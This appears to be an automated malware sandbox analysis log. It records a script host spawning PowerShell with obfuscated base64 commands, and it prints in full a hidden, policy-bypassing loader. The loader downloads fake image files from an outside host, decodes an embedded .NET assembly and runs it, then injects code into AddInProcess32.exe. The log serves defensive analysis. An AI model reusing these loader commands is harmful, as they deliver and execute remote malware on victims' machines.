                  Source: Yara matchFile source: amsi64_3744.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3744, type: MEMORYSTR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 9F9008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredydgtremdgtredgtrevdgtreddgtredgtrendgtredgtrezdgtrec8dgtrezgb1dgtregwdgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremqdgtrexdgtredidgtreodgtredgtre3dgtredgdgtreodgtredgtre3dgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtrey
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','addinprocess32',''))} }"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredydgtremdgtredgtrevdgtreddgtredgtrendgtredgtrezdgtrec8dgtrezgb1dgtregwdgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremqdgtrexdgtredidgtreodgtredgtre3dgtredgdgtreodgtredgtre3dgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','addinprocess32',''))} }"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
